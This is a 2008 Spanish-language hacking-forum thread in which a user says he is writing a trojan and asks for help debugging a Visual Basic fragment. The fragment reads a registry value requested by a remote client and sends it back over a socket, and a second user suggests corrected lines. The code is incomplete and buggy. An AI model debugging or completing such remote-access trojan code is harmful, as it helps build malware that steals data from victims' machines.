elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  error en code
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: error en code  (Leído 1,850 veces)
krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
error en code
« en: 13 Febrero 2008, 15:16 pm »

ola , estoi asiendo un troyano i el serveer me esta dando error al ocupar una de las opciones de mi troyano que lo que ase es leer una clave del registro i emviarla al cliente i este lo muestra como una msgbox  aki va el code
----------en el server-------------
Código:
If Left(datos, 2) = "hk" Then
Dim ind As Object
    Set ind = CreateObject("WScript.Shell")
    Dim tmp As String
    tmp = wsh.RegRead datos
    ws.SendData "2020" & tmp
 End If
.-----en el cliente-------
Código:
if left(datos , 4 ) ="2020" then
 datos = Right(datos, Len(datos) - 4)
msgbox ("datos , vbokonly , registro")
---------------------------------------------------------
bueno sobra decir que esta puesto en ws_DataArrival las dos i que datos es la informacion que llega que funciona en toda las otras opciones bueno ssi alguien me puede decir el error se lo agradecería


gracias de antemano ;)


En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
Chefito

Desconectado Desconectado

Mensajes: 122



Ver Perfil WWW
Re: error en code
« Respuesta #1 en: 13 Febrero 2008, 16:03 pm »

Hola. Si pusieras el error que te lanza el vb lo resolveríamos más facilmente :P. Puede que el error esté en estas lineas?
Código:
   tmp = ind.RegRead datos
    ws.SendData "2020" & tmp & vbcrlf


En línea

Moderador del foro oficial de AutoIt en español: www.AutoIt.es.

Todos tenemos inteligencia, lo malo es que algunos no nos acordamos donde la dejamos guardada ;)
krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: error en code
« Respuesta #2 en: 13 Febrero 2008, 16:38 pm »

Hola. Si pusieras el error que te lanza el vb lo resolveríamos más facilmente :P. Puede que el error esté en estas lineas?
Código:
   tmp = ind.RegRead datos
    ws.SendData "2020" & tmp & vbcrlf
no me muestra error solo se cierra
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
Chefito

Desconectado Desconectado

Mensajes: 122



Ver Perfil WWW
Re: error en code
« Respuesta #3 en: 13 Febrero 2008, 16:41 pm »

Pero probastes las lineas modificadas que te dejé?
En línea

Moderador del foro oficial de AutoIt en español: www.AutoIt.es.

Todos tenemos inteligencia, lo malo es que algunos no nos acordamos donde la dejamos guardada ;)
krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: error en code
« Respuesta #4 en: 13 Febrero 2008, 17:51 pm »

Pero probastes las lineas modificadas que te dejé?
si
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Error de code en vbs
Scripting
martiin29 2 3,452 Último mensaje 29 Diciembre 2010, 16:32 pm
por martiin29
[c++][IDE error] Code::block crash al debbugear.
Programación C/C++
anonimo12121 2 2,741 Último mensaje 18 Febrero 2012, 17:06 pm
por Eternal Idol
SMTP Error Code en C#
.NET (C#, VB.NET, ASP)
moro666 4 2,445 Último mensaje 2 Agosto 2013, 00:31 am
por Novlucker
LDAP error code 32
Desarrollo Web
JobFer 0 1,400 Último mensaje 22 Octubre 2014, 13:26 pm
por JobFer
Error with javascript code
Programación General
Eduarjr 1 1,590 Último mensaje 26 Octubre 2016, 15:14 pm
por alanzo88
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines